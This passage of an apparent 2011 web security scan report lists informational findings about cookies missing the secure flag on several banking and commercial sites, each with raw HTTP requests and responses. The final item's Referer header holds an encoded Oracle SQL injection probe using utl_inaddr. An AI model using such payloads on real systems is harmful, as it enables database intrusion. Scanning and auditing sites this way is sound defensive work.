10.51. https://feedback.live.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.live.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsathome&P2=&P3=0&P4=NOFORM&P5=DC63BAA44C3843F38378B4BB213E0A6F&P6=Washington%2c+District+Of+Columbia&P7=Original&P8=&P9=38.9069%2f-77.0284&P10=24902&P11=&P12=&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dFEEDTU HTTP/1.1
Host: feedback.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 03 Feb 2011 13:45:05 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=bingweb&brand=&&locale=en-US&P1=dsathome&P2=&P3=0&P4=NOFORM&P5=DC63BAA44C3843F38378B4BB213E0A6F&P6=Washington, District Of Columbia&P7=Original&P8=&P9=38.9069/-77.0284&P10=24902&P11=&P12=&searchtype=Web Search&optl1=1&backurl=http://www.bing.com:80/?FORM=FEEDTU
Set-Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dFEEDTU; expires=Thu, 03-Feb-2011 14:45:05 GMT; path=/
Set-Cookie: LNG=feedback.live.com=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: MSIDCookie=778b4fbd-2db4-4fa4-a996-44ac5969587d; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 522

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://feedback.discoverbing.com/default.aspx?mkt=en-us&amp;productkey=bingweb&amp;brand=&amp;&amp;locale=en-US&amp;
...[SNIP]...

10.52. https://home.americanexpress.com/home/corporations.shtml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.americanexpress.com
Path:   /home/corporations.shtml

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/corporations.shtml HTTP/1.1
Host: home.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html
Expires: Thu, 03 Feb 2011 13:45:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:45:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaneID=64.212.114.32-1296740714446790; path=/; expires=Sun, 07-Feb-16 13:45:14 GMT; domain=.americanexpress.com
Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 13:45:14 GMT; path=/; domain=.americanexpress.com
Content-Length: 58419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<TITLE>Corporate Credit Cards & Bus
...[SNIP]...

10.53. https://home.americanexpress.com/home/global_splash.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.americanexpress.com
Path:   /home/global_splash.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/global_splash.html HTTP/1.1
Host: home.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 26 Nov 2010 10:10:41 GMT
Server: IBM_HTTP_Server
Content-Type: text/html
Cache-Control: no-store
Expires: Thu, 03 Feb 2011 13:45:15 GMT
Date: Thu, 03 Feb 2011 13:45:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 13:45:15 GMT; path=/; domain=.americanexpress.com
Content-Length: 37032

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>American Express</TITLE><META http-equiv=Content-Type content="text/html; charset=windows-1252">
<STYLE type='text/css
...[SNIP]...

10.54. https://home.americanexpress.com/home/js/ad_login.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.americanexpress.com
Path:   /home/js/ad_login.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/js/ad_login.js HTTP/1.1
Host: home.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 31 Aug 2009 21:57:24 GMT
Server: IBM_HTTP_Server
Content-Type: application/x-javascript
Expires: Thu, 03 Feb 2011 20:47:26 GMT
Date: Thu, 03 Feb 2011 14:16:14 GMT
Content-Length: 9515
Connection: close
Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 14:16:14 GMT; path=/; domain=.americanexpress.com

/** SWF Object 1.5 : Flash Player detection and embed - http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.opensource.o
...[SNIP]...

10.55. https://home.americanexpress.com/home/mt_personal.shtml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.americanexpress.com
Path:   /home/mt_personal.shtml

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/mt_personal.shtml HTTP/1.1
Host: home.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html
Expires: Thu, 03 Feb 2011 13:45:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:45:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaneID=64.212.114.32-1296740713335655; path=/; expires=Sun, 07-Feb-16 13:45:13 GMT; domain=.americanexpress.com
Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 13:45:13 GMT; path=/; domain=.americanexpress.com
Content-Length: 47928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>American Express Credit Card
...[SNIP]...

10.56. https://home.americanexpress.com/home/pz/pes_basic.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.americanexpress.com
Path:   /home/pz/pes_basic.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/pz/pes_basic.js HTTP/1.1
Host: home.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 29 Nov 2010 12:03:47 GMT
Server: IBM_HTTP_Server
Content-Type: application/x-javascript
Expires: Fri, 04 Feb 2011 06:53:10 GMT
Date: Thu, 03 Feb 2011 14:16:16 GMT
Content-Length: 18578
Connection: close
Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 14:16:16 GMT; path=/; domain=.americanexpress.com

/* Personalization Enterprise Service
*
* Standard Approach : JSON Integration
* Created: Renjith Lal
* Date: 04/02/2010
*---------------------------------------------------------------------
...[SNIP]...

10.57. https://home.americanexpress.com/home/pz/pes_login.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.americanexpress.com
Path:   /home/pz/pes_login.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/pz/pes_login.js HTTP/1.1
Host: home.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 28 Oct 2010 21:43:44 GMT
Server: IBM_HTTP_Server
Content-Type: application/x-javascript
Expires: Thu, 03 Feb 2011 20:49:12 GMT
Date: Thu, 03 Feb 2011 14:16:16 GMT
Content-Length: 7866
Connection: close
Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 14:16:16 GMT; path=/; domain=.americanexpress.com

/* Personalization Enterprise Service
*
* Code below this comment is related to the Client Integrations for the PES JSON response .
*-----------------------------------------------------------
...[SNIP]...

10.58. https://itreasury.regions.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://itreasury.regions.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: itreasury.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Set-Cookie: COOKIE-ITREASURY.REGIONSTEST.COM=R1009885090; path=/
Set-Cookie: ITREASURY2.REGIONS.COM=R3486410295; path=/
Date: Thu, 03 Feb 2011 15:51:13 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 06 Nov 2009 15:20:43 GMT
ETag: "18cc7e-ee-632508c0"
Accept-Ranges: bytes
Content-Length: 238
Cache-Control: private, no-cache, no-store, post-check=0, pre-check=0, no-cache="set-cookie,set-cookie2"
Expires: Sat, 6 May 1995 12:00:00 GMT
Connection: close
Content-Type: text/html

<!--Configuration file needed for webserver to redirect to Login Screen when lazy url is entered-->
<html>
<head>
<title>Login</title>
<script language="javascript">
window.location="/wcmfd/wcmpw/Cust
...[SNIP]...

10.59. https://labs.wellsfargo.com/rapidalerts/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://labs.wellsfargo.com
Path:   /rapidalerts/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rapidalerts/ HTTP/1.1
Host: labs.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: v1st=7904FA44F0E8E4E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: JSESSIONID=D972FC3BF23E3E95BEC7A3C1F716FC0A; Path=/rapidalerts; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 13:45:18 GMT
Connection: close
Set-Cookie: LABS_Cookie=2376211466.64288.0000; path=/
Content-Length: 6311


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

10.60. https://online.americanexpress.com/myca/acctsumm/us/action

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/acctsumm/us/action

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/acctsumm/us/action HTTP/1.1
Host: online.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 13:45:22 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=10.10.14.1-1296740722368118; Path=/; expires=Sun, 07-Feb-16 13:45:22 GMT; domain=.americanexpress.com
Location: https://online.americanexpress.com/myca/acctsumm/us/en/en_US/common/SorryTemplate.jsp
Content-Length: 0
Set-Cookie: JSESSIONID=0000FBK3SQQvSewXpY5k8hB1h4g:14cr019am; Path=/; Secure
Expires: 0
Cache-Control: no-cache,no-store
Set-Cookie: NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1e045525d5f4f58455e445a4a42861c;path=/
Content-Type: text/html
Content-Language: en-US
Connection: close
Set-Cookie: sroute=621677066.58148.0000; path=/


10.61. https://online.bbandt.com/online/selfservice/main.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.bbandt.com
Path:   /online/selfservice/main.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online/selfservice/main.do HTTP/1.1
Host: online.bbandt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
connection: close
content-type: text/html; charset=iso-8859-1
date: Thu, 03 Feb 2011 14:10:48 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 305
Set-Cookie: PD_STATEFUL_70873996-26bc-11e0-8edc-00145ee71681=%2Fonline%2Fselfservice; Path=/
Via: 1.1 unknown (Alteon iSD-SSL/5.1.7)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /online/selfservice/main.do was not found on this ser
...[SNIP]...

10.62. https://online.bbandt.com/online/selfservice/main.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.bbandt.com
Path:   /online/selfservice/main.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online/selfservice/main.do?flow= HTTP/1.1
Host: online.bbandt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
connection: close
content-type: text/html; charset=iso-8859-1
date: Thu, 03 Feb 2011 14:10:49 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 305
Set-Cookie: PD_STATEFUL_7092e99e-26bc-11e0-8edc-00145ee71681=%2Fonline%2Fselfservice; Path=/
Via: 1.1 unknown (Alteon iSD-SSL/5.1.7)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /online/selfservice/main.do was not found on this ser
...[SNIP]...

10.63. https://online.wellsfargo.com/das/channel/enrollDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/channel/enrollDisplay

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /das/channel/enrollDisplay HTTP/1.1
Host: online.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:45:24 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: enrollment/enrollIdentify
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: COOKIE_SID=r9jyNKxJHkl1GTdJ5lWTN93XQhQcNjtVQB3sY9GpnkqTlsNRmp0k!-727606097;secure;path=/;domain=.wellsfargo.com;
Set-Cookie: KCOOKIE=;secure;expires=Thu, 01-Jan-1970 09:00:00 GMT;path=/;domain=.wellsfargo.com;
Set-Cookie: BRAND_COOKIE=COB;secure;path=/;domain=.wellsfargo.com;
Set-Cookie: wfacookie=O02032011054524763727930;expires=Wed, 03-Feb-2016 21:45:24 GMT;path=/;domain=.wellsfargo.com;
Set-Cookie: ISD_DAS_COOKIE=zxoWesu0jrPFr7g5lQAAAAAAA5lwALCsoKEWpoGBOdavGHC3fHw9fAdx9lHhGHNl5y3mZiKhR6v4HM0=;path=/;domain=.wellsfargo.com;
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

10.64. https://online.wellsfargo.com/signon

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signon HTTP/1.1
Host: online.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:45:25 GMT
Cache-Control: no-cache="set-cookie"
X-Cnection: close
Location: https://online.wellsfargo.com/login?LOB=CONS&ERROR_CODE=ZXJyb3IuY29va2llc05vdEVuYWJsZWQ%3D
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: OB_SO_ORIGIN=source=alternate;path=/;domain=.wellsfargo.com;
Set-Cookie: ISD_DAS_COOKIE=o2JE22B0Api8bfU5lQAAAAAAA5lwAHR50dFYpTld0G3jevD4Cra98VywSRwUGu1UVqtRMSnXRugM1Ic=;path=/;domain=.wellsfargo.com;
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://online.wellsfargo.com/logi
...[SNIP]...

10.65. https://onlineservices.wachovia.com/auth/AuthService

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /auth/AuthService

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/AuthService HTTP/1.1
Host: onlineservices.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:17:54 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=0256DD3E2F98102FBA68EF2D383024B5; Path=/; Domain=.wachovia.com
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: AuthSvsSessionID=nhGmx3xwk5gjzZG20xMtQOl6qUU=55 4N.WCv7z1Zp27CNLMkWZrcctgrr.2950501; HttpOnly; Path=/; Domain=.wachovia.com; Secure
x-frames-option: deny
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 13099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...

10.66. https://payroll.regions.com/servlet/gateway

Summary

Severity:   Information
Confidence:   Certain
Host:   https://payroll.regions.com
Path:   /servlet/gateway

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/gateway HTTP/1.1
Host: payroll.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=c38625c1a3aedba4074c3d8ad425.Public2; Path=/; Secure
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Thu, 03 Feb 2011 15:51:13 GMT
Connection: close
Set-Cookie: BIGipServerPublic=1880363180.49556.0000; path=/


10.67. https://pfo.us.hsbc.com/hsbcpb/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://pfo.us.hsbc.com
Path:   /hsbcpb/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hsbcpb/ HTTP/1.1
Host: pfo.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ""
Date: Thu, 03 Feb 2011 19:14:49 GMT
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296760489.597571; path=/; expires=Sun, 31-Jan-2021 19:14:49 GMT
Content-language: en-US
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>

<HEAD>


<link href="theme/template.css" rel="stylesheet" type="text/css">

<script language="javaScript" src="jscript
...[SNIP]...

10.68. https://quickaccount.us.hsbc.com/jsp/oao/relc/cashedge/oao_application_retrieve.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quickaccount.us.hsbc.com
Path:   /jsp/oao/relc/cashedge/oao_application_retrieve.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/oao/relc/cashedge/oao_application_retrieve.jsp?homeid=99992052&BRANDID=PREMIER HTTP/1.1
Host: quickaccount.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
Date: Thu, 03 Feb 2011 16:24:00 GMT
Pragma: no-cache
Content-Length: 343
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: CashEdgeSession=H8phNKWQQXT3SSJMxdd1hnv8H9XrsNz13f0bZvZpjhYy4pMzQm2p!-881912562; path=/; secure; HttpOnly=
Set-Cookie: BRANDID=PREMIER
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NSC_wt-rvjdlbddpvou.vt.itcd.dpn*443=ffffffff0929123f45525d5f4f58455e445a4a422a73;path=/;secure;httponly


<script>
function MM_goToURL() { //v3.0
var i, args=MM_goToURL.arguments; document.MM_returnValue = false;
for (i=0; i<(args.length-1); i+=2) eval(a
...[SNIP]...

10.69. https://sales.liveperson.net/hc/13041680/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sales.liveperson.net
Path:   /hc/13041680/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/13041680/?cmd=file&file=visitorWantsToChat&site=13041680&byhref=1&AEPARAMS&SESSIONVAR!StaticButtonNameNoScript=Generic HTTP/1.1
Host: sales.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HumanClickKEY=2662170475251338767; LivePersonID=LP i=16101423669632,d=1294435351; HumanClickSiteContainerID_2489482=STANDALONE;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 13:47:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101423669632-1296740856:0; expires=Fri, 03-Feb-2012 13:47:36 GMT; path=/hc/13041680; domain=.liveperson.net
Set-Cookie: HumanClickKEY=4239242515931163064; path=/hc/13041680
Set-Cookie: HumanClickSiteContainerID_13041680=STANDALONE; path=/hc/13041680
Set-Cookie: LivePersonID=-16101423669632-1296740856:-1:-1:-1:-1; expires=Fri, 03-Feb-2012 13:47:36 GMT; path=/hc/13041680; domain=.liveperson.net
Set-Cookie: HumanClickCHATKEY=7675585467513136947; path=/hc/13041680; secure
Content-Type: text/html
Last-Modified: Thu, 03 Feb 2011 13:47:36 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 5641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">
<head>
<link href
...[SNIP]...

10.70. https://sslgypsy-test.superpages.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sslgypsy-test.superpages.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: sslgypsy-test.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750407186-sslgypsy-test.superpages.com-7577407-636051; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:26:47 GMT; Path=/
Location: http://sslgypsy-test.superpages.com/yp.advanced.jsp?
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 0
Date: Thu, 03 Feb 2011 16:26:47 GMT
Connection: close
Set-Cookie: NSC_ttmhzqtz-443=ffffffff9482124945525d5f4f58455e445a4a421548;expires=Thu, 03-Feb-2011 16:28:47 GMT;path=/;secure


10.71. https://tokens.regions.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://tokens.regions.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: tokens.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Location: http://tokens.regions.com/iisstart.htm
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:53:40 GMT
Set-Cookie: NSC_uplfot.sfhjpot.dpn-wjq=ffffffffaf130ec145525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:17:37 GMT;path=/
Set-Cookie: rfaft2c1=rbZofua541Qr+S3Xp4Xyk3bIMdQA1; Domain=.regions.com; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regions.com_%2F_wlf=TlNDX3VwbGZvdC5zZmhqcG90LmRwbi13anFf?TxQcFo0NsG+CTkoDF7kyEhxxlOEA&; Domain=.regions.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
X-Expires-Orig: None
Cache-Control: max-age=3, must-revalidate, private
Set-Cookie: NSC_uplfot.sfhjpot.dpn=ffffffffaf130d4145525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:04:28 GMT;path=/;secure
Content-Length: 148

<HTML>
<HEAD>
<TITLE>Token Management System</TITLE>
</HEAD>
<FRAMESET cols="100%">
<FRAME src="RSASWE/WXUserHome.do">
</FRAMESET>
</HTML>

10.72. https://redcated/jaction/00asup_RetargetingSecure_1

Summary

Severity:   Information
Confidence:   Certain
Host:   https://redcated
Path:   /jaction/00asup_RetargetingSecure_1

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jaction/00asup_RetargetingSecure_1 HTTP/1.1
Accept: */*
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: redcated
Connection: Keep-Alive
